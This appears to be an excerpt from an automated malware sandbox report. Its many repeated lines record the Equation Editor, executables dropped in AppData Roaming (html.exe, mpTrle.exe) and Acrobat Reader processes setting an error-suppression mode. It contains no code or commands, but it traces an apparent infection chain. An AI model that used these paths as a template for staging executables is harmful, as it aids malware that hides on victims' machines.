Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe	Process information set: NOOPENFILEERRORBOX
